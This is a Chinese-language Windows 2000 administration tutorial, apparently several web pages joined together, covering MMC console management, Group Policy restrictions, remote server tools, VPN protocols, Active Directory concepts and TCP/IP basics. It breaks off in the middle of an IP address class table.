    作者模式和用户模式之间的另一不同之处是更改保存的控制台的方法。如果在作者模式下对控制台操作，关闭控制台时会提示保存所做的更改。然而，如果在用户模式下对控制台进行操作并且没有选中"不要保存更改到此控制台"复选框（它可以通过单击"控制台"菜单中的"选项"来获得），那么当关闭控制台时所做更改会自动被保存。
    如果产生下列任一情况，将忽略控制台的默认模式并且控制台以作者模式打开：
  §　打开控制台时 MMC 已经打开。
  §　通过快捷方式菜单命令"作者"打开控制台。
  §　在命令提示符下用 "/a" 选项打开控制台。

4.2.2 管理控制台的操作
    4.2.2.1 创建控制台
    在创建控制台之前，必须标识控制台将要处理的任务、要管理的组件，以及执行任务所必须的管理单元和控件。还应当考虑是否需要创建任务板视图和任务。在决定之后，可以打开新的控制台，开始向控制台树添加项目。
§　打开 MMC
    步骤1 单击"开始"，再单击"运行"，键入"mmc"，然后单击"确定"。
    步骤2 在命令提示中键入"mmc"，然后按回车。
    完整的 MMC 命令行语法是：
mmc path\filename.msc [/a]
path\filename.msc
/a 以作者模式打开或保存控制台，用于改变一个存在的控制台或创建一个新的控制台。

4.2.2.2 向控制台树添加项目
    可以通过调整项目层次结构帮助用户在控制台或控制台组中确定所需组件的位置。要向控制台树添加项目，可以使用 MMC 主工具栏上"控制台"菜单中的"添加/删除管理单元"命令。
    在"添加/删除管理单元"对话框中，"管理单元添加到"决定要添加的新项目位于控制台树上的哪个项目下面。默认值是"控制台根节点"。可以单击"管理单元添加到"中的项目来定位控制台树之外的对象。"添加独立管理单元"对话框显示可用管理单元的列表。对于域成员中运行 Windows 2000 的计算机，该列表包括本地安装的管理单元和在 Active Drirectory 目录服务下发布的管理单元。
§　为本地/远程计算机的新 MMC 控制台添加"用户和组"单元项目
    步骤1 打开 MMC。
    步骤2 在"控制台"菜单上，单击"添加/删除管理单元"，然后单击"添加"。

步骤3 在"管理单元"下，双击"用户和组"，如果提示，执行以下的某项操作：
§　单击"本地计算机（运行这个控制台的计算机）"，然后单击"完成"。如图4.9
§　单击"另一台计算机"，键入该项目要管理计算机的名称，然后单击"完成"。 （为远程计算机的新 MMC 控制台添加项目）
§　如果出现向导，请遵循屏幕提示。
    步骤4 要向控制台中添加另外项目，请重复步骤 3。
    注意：如果向控制台添加管理单元，但此时管理单元被损坏，请尝试将相同管理单元的另外一个实例添加到控制台，根据需要对它配置，然后删除管理单元的第一个实例。如果将控制台保存到每个用户的管理工具文件夹中（在 Windows 2000 中，位于 systemroot\Documents and Settings\user\「开始」菜单\程序\管理工具），那么可以在该用户的"程序"菜单上的管理工具文件夹中获得它

§　将扩展管理单元添加到 MMC 控制台
    步骤1通过执行以下的某项操作，按作者模式打开保存的控制台：
  §　右键单击该 .msc 文件，然后单击"作者"。
  §　单击"开始"，再单击"运行"，键入 mmc path\filename.msc /a，然后单击"确定"。
    步骤2 在"控制台"菜单上，单击"添加/删除管理单元"，然后单击要扩展的项目。
    步骤3 在"扩展"选项卡上的"可扩展的管理单元"中，选择要添加的扩展旁边的复选框，然后单击"确定"。
§　将发布的扩展管理单元添加到 MMC 控制台
    步骤1 通过执行以下的某项操作，按作者模式打开保存的控制台：
  §　右键单击该 .msc 文件，然后单击"作者"。
  §　单击"开始"，再单击"运行"，键入 mmc path\filename.msc /a，然后单击"确定"。
    步骤2 单击"控制台"菜单上的"添加/删除管理单元"。
    步骤3 在"扩展"选项卡，单击"可扩展的管理单元"中的要扩展的管理单元。
    步骤4 在"可扩展的管理单元"中，选中要添加的发布扩展旁边的复选框，然后单击"下载"。
    步骤5 如果出现一个或多个向导，请遵循屏幕上的指示操作，然后单击"确定"。
    注意：如果选中"扩展"选项卡上的"添加所有扩展"复选框，那么只有在本地安装和注册的扩展管理单元才被添加到控制台中。必须专门从目录服务下载扩展管理单元，以便使其在控制台中可用。因此，要添加给定项目的所有发布扩展，不要选中"添加所有扩展"复选框，而是选中每个发布扩展旁边的复选框。
    为远程计算机的新 MMC 控制台添加项目、将发布的管理单元添加到新 MMC 控制台、将扩展管理单元添加到 MMC 控制台，以及将发布的扩展管理单元添加到 MMC 控制台。

4.2.2.3 添加任务板视图及任务
    在向控制台添加任务板视图和任务之前，先确定需要多少个任务板视图。如果需要多个任务板视图，也必须确定如何在任务板视图中分配任务。另外，必须决定需要用哪种任务板视图显示列表和任务，或者只显示任务。要为控制台创建任务板视图，控制台必须包括至少一个管理单元。可以使用新任务板视图向导来配置标题、头和出现在任务板视图中的列表，并定义控制台树中任务板视图是带一个项目还是多个项目。完成新任务板视图向导之后，可以使用新任务向导向任务板视图中添加任务。任务可以包括控制台中项目的菜单命令，还有从命令提示运行的命令。可以创建只对控制台树或详细资料窗格的部分区域起作用的命令，或者创建可以在计算机中打开另外一个组件的命令。然而，如果从菜单命令给在控制台树中的项目创建一个任务，然后删除该项，那么任务也将被禁用。 下面继续为"用户和组"管理单元创建新任务板视图。
§　创建任务板视图
    步骤1 通过执行以下的某项操作，按作者模式打开保存的控制台：
  §　右键单击该 .msc 文件，然后单击"作者"。
  §　单击"开始"，再单击"运行"，键入 mmc path\filename.msc /a，然后单击"确定"。
    步骤2 在控制台树中，单击管理单元项。
    步骤3 在"操作"菜单上，单击"新任务板视图"。

    步骤4 遵循新任务板视图向导中的指示。
    步骤5 如果要在创建新任务板视图之后立即创建任务，请在向导的最后屏幕上选中"启动新任务向导" 复选框。 如图4.10
    注意：用户还可以在新控制台里创建任务板视图，但是必须首先将管理单元添加到控制台中。如果创建了新任务板视图并要添加任务，可以通过在新任务板视图向导的最后屏幕上选中"启动新任务向导"复选框启动新任务向导。

4.2.2.4 向收藏夹列表添加项目
    可以使用收藏夹列表创建指向控制台树里的项目和任务板视图的快捷方式。然后可以从"树"选项卡和""收藏夹""选项卡访问这些项目。下面将"用户和组"管理单元添加到 MMC 控制台里的收藏夹列表中
    步骤1 通过执行以下的某项操作，按作者模式打开保存的控制台：
  §　右键单击Lusrmgr.msc 文件，然后单击"作者"。
  §　单击"开始"，再单击"运行"，键入 mmc e:\winnt\system32\lusrmrg.msc /a，然后单击"确定"。

    步骤2 在控制台树中，单击"用户和组"管理单元。
    步骤3 在详细资料窗格中，单击"常规"选项卡或者想添加任务板视图的选项卡。
    步骤4 在"收藏夹"菜单上，单击"添加到收藏夹"。如图4.11
    步骤5 在"创建于"中，请执行以下的某项操作：
  §　要将项目添加到已有的文件夹，单击想让项目出现的文件夹，然后单击"确定"。
  §　要将项目添加到新文件夹，单击作为父文件夹的文件夹，然后单击"新建文件夹"。在"文件夹名称"中键入名称，单击"确定"，然后再单击"确定"。

    4.2.2.5 配置控制台选项
    可以使用"选项"对话框，从"控制台"菜单中选择控制台图标、更改控制台标题，以及选择控制台的默认模式。图标可以从包括 shell32.dll 在内的许多资源中选用，它位于 Windows 2000 和 Windows NT 下的 %systemroot%\system32\shell32.dll。更改控制台的标题时，请记住在默认情况下，单击控制台树中的项目时，标题栏会显示所选项的路径。但是，如果更改控制台的标题，标题栏将不显示路径。然而，如果删除标题，将恢复默认操作。当考虑将哪种模式设为控制台的默认模式后，记住如果使用用户模式，可以在任何时候使用"作者"或"运行方式"命令打开控制台，不必使用作者模式运行大部分管理任务。
§　设置 MMC 控制台选项
    步骤1 通过执行以下的某项操作，按作者模式打开保存的控制台：
  §　右键单击该 .msc 文件，然后单击"作者"。
  §　单击"开始"，再单击"运行"，键入 mmc path\filename.msc /a，然后单击"确定"。

    步骤2 单击"控制台"菜单上的"选项"。
    步骤3 在"控制台"选项卡上，执行以下操作：
  §　要更改控制台图标，请单击"更改图标"，在"文件名"中键入包含图标文件的路径，单击"当前图标"下面的某个图标，然后单击"确定"。
  §　要更改控制台的标题，请在图标右边的框中键入新标题。
  §　要更改控制台的默认模式，请在"控制台模式"中，单击打开控制台的模式。
    步骤4 如果控制台的默认模式是用户模式中的一种，请执行以下操作：
  §　要允许用户右键单击任务板视图的内容时显示菜单，请选中"在此控制台中的任务板上启用上下文菜单"复选框。
  §　要防止用户编辑控制台，请选中"不要保存更改到此控制台"复选框。
  §　要让用户能访问"自定义视图"对话框，请选中"允许用户自定义视图"复选框。

4.2.3 管理控制台的组策略
    在 Windows 2000中，可以使用组策略限制访问特定管理单元或 MMC 的功能。可以对计算机用户或域的组织单元启用组策略。要为特定计算机的用户设置 MMC 或管理单元策略，必须首先将组策略管理单元添加到新建的控制台。要为域设置 MMC 或管理单元策略，必须使用配置为域控制器的计算机，而且必须是该域的管理员或有相等权力。可以为用户、组或组织单元设置策略来限制或允许访问指定的管理单元。还可以设置策略限制用户、组和组织单元使用未明确许可的管理单元（除了在允许列表以内的，限制所有的管理单元）。
§　限制访问 MMC 中的作者模式
    步骤1 打开 MMC。
    步骤2 在"控制台"菜单上，单击"添加/删除管理单元"，然后单击"添加"。
    步骤3 在"管理单元"下，单击"组策略"，然后单击"添加"。
    步骤4 在"选择组策略对象"对话框中，执行以下的一项操作：
  §　要编辑本地组策略对象，请单击"本地计算机"。
  §　要编辑不同的组策略对象，请单击"浏览"。
    步骤5 单击"完成"，再单击"关闭"，然后单击"确定"。

组策略管理单元将打开指定的组策略对象。
    步骤6在控制台树中，单击"Microsoft Management Console"。 如图4.12
    步骤7 在详细资料窗格中，双击"限制用户进入编辑模式"。

步骤8 在"策略"选项卡上，执行以下任一项操作： 如图4.13
  §　要允许用户在 MMC 中使用编辑模式，单击"未配置"或"禁用"。
  §　要限制用户在 MMC 中使用编辑模式，单击"启用"。
    注意：必要是管理员或具有相等权力才能配置组策略。必须使用 Windows 2000 来配置 MMC 的组策略，该功能在其他版本 Windows 上运行的 MMC 中不可用。

4.3 远程管理服务器
    使用 Windows 2000 Server 和 Windows 2000 Advance Server 安装光盘上的 Windows 2000 管理工具，用户可以从运行 Windows 2000 的任何计算机上远程管理服务器。Windows 2000 管理工具包含 Microsoft 管理控制台的管理单元和用于管理运行 Windows 2000 Server 的计算机的其他管理工具，这些管理工具在 Windows 2000 Professional 中是不提供的。
    要在本地计算机上安装 Windows 2000 管理工具，请打开相应的 Windows 2000 Server 光盘上的 "I386"（或 Alpha）文件夹，然后双击 Adminpak.msi 文件。按照 Windows 2000 管理工具安装向导中的指示安装, 如图4.14。安装 Windows 2000 管理工具之后，可通过单击"开始"，指向"程序"，然后指向"管理工具"来访问服务器管理。

在 Windows 2000 Server 上，可以使用软件安装管理单元以两种方式将 Windows 2000 管理工具配置给单位中的其他计算机：
§　将 Windows 2000 管理工具指派给其他计算机。它将自动安装在远程计算机上。
§　在 Active Directory 中发布 Windows 2000 管理工具。在完成之后，管理员可在需要时使用远程计算机控制面板中的"添加/删除程序"进行安装。
    在安装完毕后下列服务器管理工具将包含在 Windows 2000 管理工具中：
§　Active Directory 域和信任
§　Active Directory 架构
§　Active Directory 站点和服务
§　Active Directory 用户和计算机
§　证书授权机构
§　群集管理器
§　连接管理器管理工具包

§　　DHCP
§　分布式文件系统
§　DNS
§　Internet 验证服务
§　Internet 服务管理器
§　QoS 许可控制
§　远程引导盘生成程序（远程安装服务的一部分）
§　远程存储
§　路由和远程访问
§　电话服务
§　终端服务管理器、许可证和客户端连接管理器
§　WINS

返回


Windows 2000 的虚拟专用网络

《一键清理系统垃圾》

Windows 2000 的虚拟专用网络

    虚拟专用网络（Virtual Private Network，简称VPN）是通过Internet 或公共网络建立专用的网络连接，扩展了专用网络的范围。利用VPN 技术，可以通过Internet 或公共网络模拟点对点专用连接，在计算机之间收发数据，其效果与在专用线路上进行数据传输一样安全、有效。

    为模拟点对点连接，需要用路由信息的标识头将数据封装打包，这个标识头保证数据穿过公共网络到达目的地；为模拟专用连接，应将数据进行可靠的加密，即使在公共网络上截获到数据包，如果没有密匙是无法辨认的。对数据进行封装和加密的连接才是一个真正的虚拟专用的网络（VPN）连接。
公司员工在家里或旅途中可以利用公共网络（例如Internet），使用VPN连接建立到公司内部服务器的远程访问连接。公司也可以利用VPN连接在地理上分散的分公司或办事机构，也可以和有业务往来的公司建立安全通信的连接。通过Internet路由的VPN连接，逻辑上可以作为专用的WAN连接来使用，事实上拓宽公司的LAN，建立安全可靠的WAN 。

    Windows 2000支持两种类型的VPN技术： （1） 点对点隧道协议（PPTP），它使用了用户级点对点协议的认证方法和微软的点对点数据加密方法；（2）IPSec 的L2TP协议，使用用户级PPP认证方法和IPSec级的证书进行数据加密。

    点对点隧道协议（PPTP）是在Windows NT4.0中就已支持的隧道协议工业标准，是对点到点协议（PPP）的扩展，增强了PPP的认证、压缩、加密功能。PPTP和微软的点对点加密（MPPE）提供了主要的VPN服务：封装和专用数据加密。

图1：PPTP封装和加密的PPP frame

    图1表示把一个PPP frame用一个路由头（GRE）和一个IP头封装在一起。并通过MPPE认证过程产生的密匙来加密PPP frame 。

    两层隧道协议（L2TP）是一个基于RFC的隧道协议，它不使用MPPE对PPP datagrams 进行加密，而依靠IPSec提供加密服务，L2TP和IPSec的综合被称为基于IPSec的L2TP

图2：L2Tp和IPSec封装和加密的PPP frame

    利用IPSec提供加密服务，使信息安全性更高。IPSec提供对TCP/IP 协议组中的所有IP及其上层的协议保护，它是通过将算法和密匙相结合，实现信息安全保护。算法是一种数学处理，通过它来保护信息，密匙是读取、修改和验证安全数据所需的密码或数字。为了保证安全通信， 两台计算机必须有相同和共享的密匙。IPSec使用Diffie-Hellman算法交换密时，而不是通过网络直接传送密匙，提高信息传输安全性。用户还可以自行改变默认的密匙交换和数据加密密匙设置，进一步提高安全性。

返回


Windows 2000 的一些基本概念

《一键清理系统垃圾》

Windows 2000 的一些基本概念

本章主要内容：
1、　网络目录
2、　X.500 推荐标准
3、　Kerberos
4、　ADS 的引入及其相关概念
5、　DNS、DHCP、WINS 服务在 Windows 2000 Server 中的新变化
6、　账号与安全
    1. 什么是网络目录
    在目录服务出现之前，大多数的网络操作系统都是"基于服务器"的操作系统，即多数的帐户管理工作都是由网络中的各个服务器独立完成的，每台服务器都维护着一个用户列表，它记录了用户是否可以访问它的资源（帐户数据库）及相应用户访问资源的权限（访问控制列表），即资源的分散管理。
    网络目录的引入解决了上面的问题，网络目录是一个存储着用于访问、管理或配置网络的信息的数据库。

它们可以存储多种不同类型的信息，包括：
§　用户帐户信息（登录名、口令、权限）
§　用户个人信息（电话号码、地址、雇员ID、部门、职位、工资等）
§　外围设备配置信息（打印机、扫描仪、传真、调制解调器）
§　应用程序配置信息（桌面系统参数、缺省目录）
§　安全信息
§　网络设备配置信息
    只要用户能够想到的信息，都可以存储在目录中；当把这些信息都存储在一个统一的标准数据库中，用户可以利用它们完成许多工作。最为普遍地就是网络管理员利用这些信息完成网络访问控制和网络资源访问控制，从而使目录成为对大多数网络活动的集中控制中心。许多在早期网络中最难于解决的配置问题，在网络目录服务应用后都变得非常简单。目前一些成熟的网络目录有：
    域名系统（Domain Name System）
    Windows 因特网名称服务（Windows Internet Name Service）
    NOVELL 目录服务（NOVELL Directory Service）
    这些目录服务虽然工作方式和应用环境不同，但是它们都存储着用于访问或管理网络的信息，从实现集中化的网络管理。它们为在 Windows 2000 中新推出的 Active Directory Services 提供了有益的经验。

    2. 什么是 X.500
    由于网络目录需要存储信息的多样性，数据库中的相关数据文件的增长的快速性，可能导致现有计算机的处理能力无法满足它的需求，在 Active Directory Services 中就采用了 X.500这个推荐标准。X.500 技术规范提供了一个供开发商建立自己产品的模型，使不同的开发商开发的产品能够彼此访问共享信息，它规定了信息组织、命名和访问的一般性方法，即规定了目录技术为了实现互操作性而遵守的格式。如微软开发的 ADS 与 NOVELL 公司开发的 NDS 在实现形式上截然不同，但由于两者的名字空间一致，所以两种产品均可以访问目录中存储的信息。从某种意义上讲，它类似于 OSI 的七层网络结构模型，OSI 网络模型简单定义了网络软件在各层必须完成的功能，而没有直接规定具体的实现方法。对于符合 X.500 的网络目录（如：ADS），其数据库在设计时均遵循以下两个原则：
    使用目的---存储网络资源信息
    整体结构---采用层次结构

3. 什么是简化目录访问协议（LDAP）
    在向目录中填入对象后，用户需要考虑的问题是如何提供一整套完善的数据访问功能用于向用户显示信息，以便用户查找和使用。利用 X.500 技术规范提供的目录访问协议 DAP 可以完成这一功能。DAP 定义了用于读取目录数据库信息和修改目录数据库的方法，DAP 在安全性上的可扩展性满足了 X.500 允许采用多种安全保护方法的需求，并且 DAP 利用将工作转移到客户机上的方法有效的降低了目录服务器的工作负荷。但是由于现有的客户机的无法提供足够资源以满足 DAP 软件得需要及 DAP 的兼容性差的原因，它并未得到广泛的应用，人们针对 DAP 的以上缺陷开发了一个新协议：简化目录访问协议 LDAP。LDAP 是 DAP 的一个子集，它能够实现 DAP 的大部分功能，它不是基于客户的服务，客户的许多处理工作还转移到了支持 LDAP 服务的服务器上，所以它对客户设备的要求很低，掌上型笔记本能够对目录进行远程服务就是得益于此；LDAP 客户软件包能够访问多家厂商提供的目录信息，由于以上优点大多数目录技术都将 LDAP 服务作为基本功能的一部分，ADS 也采用它作为其基本功能。LDAP 实际上是一个机制，用来与 Active Directory 通信，完成基本的读写和修改操作。

4. 什么是 kerberos V5 验证
    Windows 2000 支持两个内核确认协议：Windows NT LAN 管理器（NTLM）和 Kerberos，Kerberos 是首选的确认协议。当与 NT3.x－NT4.0 网络共存时，Windows 2000 利用 NTLM 实现安全访问确认，使访问共享资源生效。由于 Windows 2000 对多确认协议的透明支持，使得用户可以实现阶段性的将桌面系统迁移到 Windows 2000 如只将服务器升级到 Windows 2000 Server 而桌面操作系统仍为 Win95/98，对于这些用户 Windows 2000 采用 NTLM 确认模式。
    在 Windows NT 3.x-4.0 中确认关系是不可传递的，即域 1 信任域 2，域 2 信任域 3，并不说明域 1 信任域 3。当采用 Kerberos 确认协议时，Windows 2000 支持传递信任。Kerberos 确认协议通过以下优点实现了在 Windows 2000 的精密级存取控制，大大提高了 Windows 2000 的安全性和访问控制的灵活性，这些是 NTLM 所无法比拟的：
    Kerberos 是一个独立的平台，能广泛的实现安全协议
    Kerberos 能更快的与其它计算机建立会话
    Kerberos 的信任关系是完全可传递的
    Kerberos 支持对确认的授权
    Kerberos 使用对称加密技术

5. 什么是活动目录(Active Directory)
    5.1 没有 ADS 的 Windows NT 系统
    在 ADS 出现之前，WindowsNT（4.0及以前的版本）使用基于域的方式管理网络，它解决了"基于服务器"的操作系统中存在地许多问题，推动了网络的发展，基于域结构的网络地优点在于：
§　用户一次性登录，访问域内所有资源
§　集中管理用户、工作组和网络资源
§　对资源的一般性访问
    而 Windows NT 在大型网络中使用时，由于其平面式的域间结构，域与域之间的资源共享需要通过域间信任来完成，且这种信任是无法传递的，所以增加了结构的复杂性和管理难度，它只能满足工作组级网络的需求，无法满足大型网络的需求。
    5.2 什么是域
    域：由用户和计算机组成的一个逻辑组。
    在一个域中由域控制器统一的管理帐户数据库，管理所有的用户登录、资源访问认证及其它管理任务。用户的登录认证过程是一次性的认证过程，即用户只有在登录时才会访问域控制器，在以后访问网络的过程中即使它访问资源的权限发生变化，也不影响现有对网络资源的访问权限，只有重新登录才能使改变生效。

    5.3 主域控制器和备份域控制器
    在 Windows NT 中有三种服务器类型：
    主域控制器 PDC
    备份域控制器 BDC
    成员服务器
    每一类服务器都对应着网络整体设计中的一方面功能，在安装 NT Server 时需要选择计算机的类型，在每个域中只能有一台 PDC 和多台 BDC。在 PDC 中存储着域帐户数据库用于对用户的认证，在每个 BDC 中都保存着一个帐户数据库的复本，BDC 通过定期的数据库同步过程保证数据库副本与 PDC 中的主数据库保持一致。用户只能在 PDC 中对帐户数据库进行修改，在 BDC 中只能对用户进行认证，无法修改帐户数据库。成员服务器中不存储帐户数据库的复本，它主要用于处理各种专项的工作任务如打印服务器、文件服务器、邮件服务器等。
    5.4 域间的委托
    NT 在缺省状态下，每个域是一个独立的实体，域与域之间不共享信息。如果需要访问其它域中的资源，则需要在两个域之间建立委托关系，委托关系定义了连接两个域的通信链路，在委托关系中包含两个对象：在一个域中包含需要访问其它域资源的用户帐户或组（受托域Trusted）、在另一个域中包含着需要被访问的资源（委托域Trusting），在确定委托关系时要注意这两个对象的定义区别。当 A 域委托 B 域而 B 域并未作反向委托 A 域时，称为单向委托（one-way trust），即B域用户访问A域资源反之则不行；当A域委托B域同时B域也反向委托A域时，称为双向委托（two-way trust），即B域用户访问A域资源反之亦然。

5.5 四种域模型
    针对不同的网络应用环境，用户可以采用不同的域模型，域模型定义了用户环境中目录服务的结构。在 NT 环境中有四种基本的域模型，下面说明了它们的优缺点：
    单域 所有用户和计算机都定义在一个域中，适用于需要进行集中管理的少于 40000 个对象的环境。其优缺点如下：
    1. 单域模型的实现和管理简单，但随着资源的增加，系统性能会降低
    2. 用户帐户的集中管理，但所有用户帐户存储在一个数据库中，无法按功能或位置进行分类
    3. 域内资源的集中控制，与用户管理一样也无法按功能或位置进行分类
    4. 不需要委托关系，随着服务器数量的增加，浏览器的性能会降低
    单主域模型 至少包含两个域，在主域中定义了所有的用户帐户，在另一个域中管理所有的资源。在模型中，系统为域中的每项资源都建立了对主域的单向委托关系。它适用于成员对象大于 40000，集中的管理用户帐户，而且需要控制不同部门或位置的物理资源的用户环境。其优缺点如下：
    1. 方便的集中控制多个工作组的资源，但随着用户数量的增加，系统性能会降低
    2. 用户帐户的集中管理，但必须在每个资源域中定义本地工作组
    3. 可以对资源进行逻辑分类（按部门、地理位置），资源域必须委托主域以便正确的设置全局工作组。
    4. 全局工作组只能生成一次

多主域模型
    在四种模型中缩放性最好的一种。它在单主域模型的基础上允许有多个域定义用户帐户。在这种模型中主域与主域之间具有双向委托关系，且每个资源域都与所有包含可能访问其资源的用户的主域保持单向委托关系。其优缺点如下：
    1. 为具有中心信息部门的大型应用环境而设计，但必须在多个域中定义本地工作组和全局工作组
    2. 可以灵活的缩放以适应不同规模的网络，但必须管理数量众多的委托关系
    3. 每个域都可以进行独立的管理，但用户帐户分散存储在各个域的数据库中，会造成管理的混乱
    完全委托模型
    它充分利用了目录服务，每个域都具有用户帐户和资源帐户，每个域必须委托所有的其它域，这种模型适合于企业的各个部门或地方分支机构都需要控制自己的用户帐户和资源。其优缺点如下：
    1. 适合于没有中心信息部门的企业应用，但需要管理数量众多的委托关系
    2. 灵活的缩放以适合任何数量级的用户环境，随着域的增加管理负荷也相应增加
    3. 每个域都可以进行独立的管理，但必须与其它管理员之间有清楚的职责划分
    4. 用户和资源帐户被划分成多个便于管理的单位
    以上用户回顾了不带 ADS 的 NT 操作系统的特点和优缺点，下面用户来讨论一些关于带有 ADS 的 NT 操作系统的基本概念。

5.6 带有 ADS 的 Windows 2000 系统
    正如 Windows NT 的出现克服了"基于服务器"的网络操作系统在管理用户和资源时的缺点，而 Windows 2000 Server 和 Active Directory Services 的出现是用于解决基于域的网络环境对大型网络的应用过于复杂，无法满足扩展的需要。
    体系结构。当使用活动目录时，网络和网络中的对象通过域、树、森林、信任关系、组织单元（OU）和站点的结构来进行组织。
    内部交流。因为活动目录是基于标准的目录访问协议，因此它可以和其他的目录服务相互操作，并且可以被遵守协议的第三方应用程序进行访问。最后的部分描述活动目录如何与其他更广泛的技术相互交流的。
    Windows 2000 操作系统中活动目录可以提供一下的优点：
    与 DNS 集成。活动目录使用域名系统（DNS）。DNS 是一种 Internent 标准服务，它可以进行用户可读的计算机名称（例如 mycomputer.microsoft.com）和计算机可读的数值 Internet（IP）地址（由句号分隔的四位数）之间的转换。这使得运行在 TCP/IP 网络上的计算机可以识别和连接另一台计算机。
    灵活的查询。用户和管理员可以使用"开始"菜单上的"查询"命令、桌面上的"我的网络"图标或者"活动目录用户和计算机连接"插件来根据对象的属性快速的查找网络上的对象。例如，可以使用一个人的姓、名、E-mail 名称、办公室地址或者其他属性来进行查找。查找信息的功能已经用全局目录进行了优化了。
    可扩展性。活动目录是可扩展的，就是说管理员可以向模式中添加新的对象类，也可以向已经存在的对象类添加新的属性。模式包括每一个对象类和对象类属性的定义，它们可以存储在目录中。例如，可以向用户对象添加购买机构属性，然后可以将用户的购买机构范围做为用户帐号的一部分进行存储。

基于策略的管理。组策略是在初始化时对计算机或者用户进行的配置。所有的小组策略设置都包含在组策略对象（GPO）中，它可以应用与活动目录站点、域或组织单元中。GPO 设置确定对目录对象和域资源的访问、哪些资源域是用户可以访问的以及这些资源域应该如何使用。
    可伸缩性。活动目录包括一个或多个域，其中每一个都有一个或多个域控制器，这些控制器使用户可以对目录进行改变来任何满足网络的需求。多个域可以结合成为一个域树，而多个域树又可以结合成为一个森林。最简单的结构就是只有一个域、一个树和一个森林的网络。
信息复制。用户可以在任何域控制器中更新目录。在一个域中配置多个域控制器可以提供容错功能和平衡网络负荷的功能。如果域中一个域控制器变慢、停止或出现故障，那么此时由于相同域中的其他的域控制器包含与它相同的数据，它们就可以提供必要的目录访问。
    信息安全。用户授权和访问控制的管理与活动目录完全的集成，它们是 Windows 2000 操作系统的重要安全特性。活动目录集中管理用户授权。访问控制不仅可以作用于目录中的每一个对象，还可以作用于每一个对象的任何属性上。此外，活动目录提供应用程序的安全存储和安全策略范围。
    互操作性。因为活动目录是基于标准的目录访问协议，例如轻型目录访问协议（LDAP），因此它可以和其他使用这些协议的目录服务进行互操作。一些应用程序编程接口（API）--例如活动目录服务接口（ADSI）--使得开发者可以访问这些协议。
    ADS 的目标
    ADS 的总目标是为了减少用户和管理员在网络相关工作上的工作负荷。为了达到这一目的，ADS 通过提供通用的网络资源接口和直观的网络资源访问界面，使用户能够以一致性的方式管理自己的整个网络。

什么是域
    Windows 2000 Server 中的域的概念与 NT 中域的概念并没有区别，只是将它的范围扩大到了整个网络。域是 ADS 树状结构的基石，最先建立的域用户称之为根域，它位于整个树状结构的顶级，并决定了 ADS 名字空间的起始点。如用户建立了一个根域为 NT2000.COM,可以在其下建立相应的子域如 ADS.NT2000.COM ,以后在根域下所建立的域均为其的子域。
    在NT中用户利用建立域间委托实现域间的资源互访，在 Windows 2000 中这种委托关系仍然存在，但它们是缺省设置，与在 NT 中的委托关系的工作方式有所不同。在 Windows 2000 的树状结构中所有的子域都会自动与其父域建立双向委托关系，并且这种委托关系已经变为具有传递性。
    什么是 OU(Organizational Units)
    OU 对象是用于组织目录中资源的容器对象，它可以保含下列类型的对象：用户、计算机、工作组、打印机、应用程序、安全策略、文件共享、其它 OU,但只有一种对象不能包含在 OU 中，即其它域中的任何对象。组织机构给域带来了层次化的结构，就象是将多个域连接在一起形成了一个完整的目录，每个 OU 都象是一个子目录一样用于组织目录中的指定的不同资源。微软为了适应企业对目录结构的不同需求，提出了七种不同的基本 OU 结构模型：地理模型、对象模型、以成本为中心的模型、项目模型、业务单位模型、管理模型、及混合模型；用户可以根据企业自身业务的需要选择相应的模型。

什么是域树
    当在域中用户创建了根域并在其下创建子域，这样由根域及其子域就组成了一个域树，一个域树必须有一个相邻的名字空间，并把根域名作为域名。按树结构主枝目录为用户带来了许多好处，在树结构中所有子域与父域之间都具有双向委托关系，并且这种委托关系具有可传递性，由此说明域树中的用户和组均可被授权访问树中的任何对象。
    什么是域森林
    在一个机构中如果包含多个域树并且希望在多个域树间共享资源，用户可以通过在域树间建立双向委托关系将它们联合在一起，即形成了所谓的域森林。这些树没有形成一个相邻的名字空间。在建立域森林后，所有树拥有一个公共的全局目录，包含森林中每个对象的特定信息。
    什么是站点
    站点反映网络的物理结构,站点为域树和域森林中的域控制器及其它计算机提供信息以识别连通性好的网络区域，以便域控制器间以最快速度复制变更信息。活动目录中每个站点可以包含多个域，并且一个域可以作为多个站点的成员。
    什么是全局目录
    全局目录是有活动目录自动创建，包含域树和域森林中的每个对象的多个属性，可以利用这些属性在目录中搜索整个域森林。而在域树中可以搜索对象的任何属性。在每个域中包含一个全局目录已经足够，过多的全局目录会造成网络带宽的浪费。

6. TCP/IP基础
TCP/IP的背景
    传输控制协议/网际协议 (TCP/IP) 是业界标准的协议组，为跨越局域网和广域网环境的大规模互联网络设计，TCP/IP 始于 1969 年。
§　1974 年，传输控制协议 (TCP) 作为规范草案引入，描述了如何在网络上建立可靠的、主机对主机的数据传输服务。
§　1981 年，网际协议 (IP) 以草案形式引入，描述了如何在互连的网络之间实现寻址的标准以及如何进行数据包的路由。
    1983 年 1 月 1 日，ARPANET 开始对所有的网络通讯和基本通讯都要求标准使用 TCP 和 IP 协议。
    TCP/IP 协议组在各种 TCP/IP 软件中实现，可用于多种计算平台。今天，TCP/IP 在 Internet 上广泛使用，并经常用于建立大的路由专用互联网络。

TCP/IP参考模型
    TCP/IP 基于四层参考模型。属于 TCP/IP 协议组的所有协议都位于该模型的上面三层。
    如图 1 所示，TCP/IP 模型的每一层都对应于国际标准组织 (ISO) 提议的七层"开放系统互连 (OSI)"参考模型的一层或多层。

TCP/IP 模型中每一层所执行的服务类型和所使用的协议在下表中详细描述。

层
描述
协议

应用
    定义了 TCP/IP 应用协议以及主机程序与要使用网络的传输层服务之间的接口。
    HTTP、Telnet、FTP、TFTP、SNMP、DN、SMTP、X-Window 以及其他应用协议

传输
    提供主机之间的通讯会话管理。定义了传输数据时的服务级别和连接状态。
    TCP、UDP、RTP

Internet
    将数据装入 IP 数据报，包括用于在主机间以及经过网络转发数据报时所用的源和目标的地址信息。实现 IP 数据报的路由。
    IP、ICMP、ARP、RARP

网络接口
    指定如何通过网络物理地发送数据，包括直接与网络媒体（如同轴电缆、光纤或双绞铜线）接触的硬件设备如何将比特流转换成电信号。
    以太网、令牌环、FDDI、X.25、帧中继、RS-232、v.35

IP地址
    Internet 团体定义了五种类型的地址。A 类、B 类 和 C 类地址用于指派 TCP/IP 节点。
    地址类定义了每个地址的网络 ID 和主机 ID 使用哪些位。地址类还定义了每个网络能支持多少网络和主机。
    下表用 w.x.y.z 指定任意给定 IP 地址中的四个八位字节数。这个表用于显示：
§　 任意给定 IP 地址的第一个八位字节数 (w) 如何有效地表示地址类。
§　地址中的八位字节数如何分成网络 ID 和主机 ID。
§　每个网络可用于每个类的可能网络和主机数量。

类别
w 的值
网络 ID
